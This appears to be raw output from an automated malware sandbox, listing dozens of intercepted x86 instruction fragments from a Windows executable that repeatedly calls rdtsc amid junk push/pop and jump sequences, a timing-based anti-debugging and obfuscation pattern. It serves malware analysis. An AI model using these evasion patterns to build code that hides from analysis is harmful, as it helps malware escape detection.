Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 36AE0E second address: 36AE24 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jbe 00007FCA7480D354h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 36AE24 second address: 36AE28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 36AE28 second address: 36AE35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 36AE35 second address: 36AE39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 36AE39 second address: 36AE52 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCA7480D346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007FCA7480D348h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 372EB0 second address: 372EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 372315 second address: 372333 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FCA7480D346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FCA7480D351h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 372490 second address: 37249A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FCA74808076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 37249A second address: 37249E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 37249E second address: 3724A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 372628 second address: 372642 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA7480D34Eh 0x00000007 jo 00007FCA7480D34Eh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 374E58 second address: 374EB4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCA74808078h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnp 00007FCA74808082h 0x00000011 ja 00007FCA7480807Ch 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jns 00007FCA7480808Eh 0x00000021 mov eax, dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FCA74808087h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 374EB4 second address: 374ED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA7480D359h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 374ED1 second address: 374EE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 374EE3 second address: 374F17 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCA7480D357h 0x00000008 jmp 00007FCA7480D351h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop eax 0x00000010 movzx esi, ax 0x00000013 add dword ptr [ebp+122D2F11h], esi 0x00000019 push 296891B2h 0x0000001e push eax 0x0000001f push edx 0x00000020 jbe 00007FCA7480D348h 0x00000026 push eax 0x00000027 pop eax 0x00000028 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 374F17 second address: 374F22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FCA74808076h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 375096 second address: 37509A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 375412 second address: 375416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 375416 second address: 375422 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 375595 second address: 37559F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCA7480807Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 375B67 second address: 375B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 375DAD second address: 375DB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 37817E second address: 3781F0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FCA7480D34Bh 0x0000000e nop 0x0000000f movzx edi, ax 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007FCA7480D348h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e push edx 0x0000002f mov si, 46C1h 0x00000033 pop esi 0x00000034 mov dword ptr [ebp+1245262Eh], ecx 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edi 0x0000003f call 00007FCA7480D348h 0x00000044 pop edi 0x00000045 mov dword ptr [esp+04h], edi 0x00000049 add dword ptr [esp+04h], 00000017h 0x00000051 inc edi 0x00000052 push edi 0x00000053 ret 0x00000054 pop edi 0x00000055 ret 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 jl 00007FCA7480D348h 0x0000005f push esi 0x00000060 pop esi 0x00000061 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 377856 second address: 37785A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 37785A second address: 377863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 379708 second address: 37971D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA74808081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3789F3 second address: 378A04 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007FCA7480D346h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 37971D second address: 37976D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FCA74808080h 0x00000012 jmp 00007FCA74808089h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FCA74808087h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3794B0 second address: 3794B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 37B520 second address: 37B532 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnp 00007FCA74808076h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 37B532 second address: 37B581 instructions: 0x00000000 rdtsc 0x00000002 js 00007FCA7480D346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FCA7480D34Dh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 pushad 0x00000016 mov di, 197Eh 0x0000001a popad 0x0000001b push 00000000h 0x0000001d add dword ptr [ebp+122D2387h], eax 0x00000023 push 00000000h 0x00000025 mov edi, dword ptr [ebp+122D386Eh] 0x0000002b push eax 0x0000002c pushad 0x0000002d push eax 0x0000002e jmp 00007FCA7480D354h 0x00000033 pop eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 37B581 second address: 37B585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 37CEF3 second address: 37CF0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA7480D355h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 37CF0C second address: 37CF11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 37CF11 second address: 37CF22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jl 00007FCA7480D361h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 37E5F6 second address: 37E624 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FCA74808076h 0x00000009 jo 00007FCA74808076h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jmp 00007FCA74808085h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 38032F second address: 38033F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FCA7480D348h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 37E6FE second address: 37E704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 38033F second address: 380345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 37E704 second address: 37E729 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA74808089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 380345 second address: 380349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 37E729 second address: 37E72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 380349 second address: 38034D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 37E72E second address: 37E734 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 38132E second address: 381333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 380463 second address: 380467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 380467 second address: 38046B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 38046B second address: 380471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3814B5 second address: 3814B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 380471 second address: 380477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 382371 second address: 382376 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3814B9 second address: 3814CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCA7480807Bh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3814CC second address: 3814E8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCA7480D346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCA7480D34Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3843C8 second address: 3843CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 38343A second address: 383440 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 383440 second address: 383509 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCA7480808Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FCA7480807Ah 0x00000010 nop 0x00000011 jc 00007FCA74808088h 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov bx, ax 0x00000021 jl 00007FCA7480807Ch 0x00000027 mov ebx, dword ptr [ebp+12452521h] 0x0000002d mov dword ptr fs:[00000000h], esp 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007FCA74808078h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e jmp 00007FCA7480807Eh 0x00000053 mov eax, dword ptr [ebp+122D0B91h] 0x00000059 push 00000000h 0x0000005b push ebp 0x0000005c call 00007FCA74808078h 0x00000061 pop ebp 0x00000062 mov dword ptr [esp+04h], ebp 0x00000066 add dword ptr [esp+04h], 00000015h 0x0000006e inc ebp 0x0000006f push ebp 0x00000070 ret 0x00000071 pop ebp 0x00000072 ret 0x00000073 js 00007FCA7480807Ch 0x00000079 sub dword ptr [ebp+1247398Dh], esi 0x0000007f push FFFFFFFFh 0x00000081 sub dword ptr [ebp+122D337Eh], edi 0x00000087 nop 0x00000088 pushad 0x00000089 push ecx 0x0000008a push eax 0x0000008b push edx 0x0000008c rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 383509 second address: 383516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnc 00007FCA7480D34Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 38691A second address: 38691F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 387984 second address: 38798E instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCA7480D346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 38798E second address: 387994 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 387994 second address: 3879C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA7480D350h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, dword ptr [ebp+122D1A7Eh] 0x00000014 push 00000000h 0x00000016 mov edi, dword ptr [ebp+122D1984h] 0x0000001c push 00000000h 0x0000001e xor dword ptr [ebp+122D241Ch], esi 0x00000024 xchg eax, esi 0x00000025 push edi 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 pop eax 0x0000002a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 389A9C second address: 389AAA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCA74808076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 38A9F8 second address: 38A9FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 387B71 second address: 387B92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCA74808089h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 386B72 second address: 386B79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 386B79 second address: 386B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jng 00007FCA74808080h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 38CB28 second address: 38CBAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebx 0x00000009 call 00007FCA7480D348h 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], ebx 0x00000013 add dword ptr [esp+04h], 00000015h 0x0000001b inc ebx 0x0000001c push ebx 0x0000001d ret 0x0000001e pop ebx 0x0000001f ret 0x00000020 or dword ptr [ebp+122D281Eh], esi 0x00000026 xor dword ptr [ebp+122D18B6h], eax 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+1245DF37h], ebx 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007FCA7480D348h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 00000019h 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 jmp 00007FCA7480D354h 0x00000055 xchg eax, esi 0x00000056 jmp 00007FCA7480D34Fh 0x0000005b push eax 0x0000005c pushad 0x0000005d push edi 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 38CBAB second address: 38CBB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 38CBB4 second address: 38CBB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 386B8B second address: 386C0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sbb di, 7CA7h 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov bx, dx 0x00000016 mov dword ptr fs:[00000000h], esp 0x0000001d mov ebx, dword ptr [ebp+122D3576h] 0x00000023 mov eax, dword ptr [ebp+122D1289h] 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007FCA74808078h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 0000001Bh 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 add edi, 42ADA3D7h 0x00000049 movsx edi, ax 0x0000004c push FFFFFFFFh 0x0000004e push 00000000h 0x00000050 push edi 0x00000051 call 00007FCA74808078h 0x00000056 pop edi 0x00000057 mov dword ptr [esp+04h], edi 0x0000005b add dword ptr [esp+04h], 00000015h 0x00000063 inc edi 0x00000064 push edi 0x00000065 ret 0x00000066 pop edi 0x00000067 ret 0x00000068 mov edi, eax 0x0000006a nop 0x0000006b jl 00007FCA7480807Eh 0x00000071 push ebx 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 389D25 second address: 389D2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3242CC second address: 3242F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007FCA74808088h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3242F6 second address: 3242FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3242FA second address: 3242FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 38BD78 second address: 38BD7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 393A7C second address: 393A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 393A80 second address: 393A84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 393A84 second address: 393AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA74808088h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 32AE5A second address: 32AE8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA7480D34Fh 0x00000009 pop edi 0x0000000a pop eax 0x0000000b push edx 0x0000000c jno 00007FCA7480D34Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007FCA7480D346h 0x0000001a jno 00007FCA7480D346h 0x00000020 rdtsc
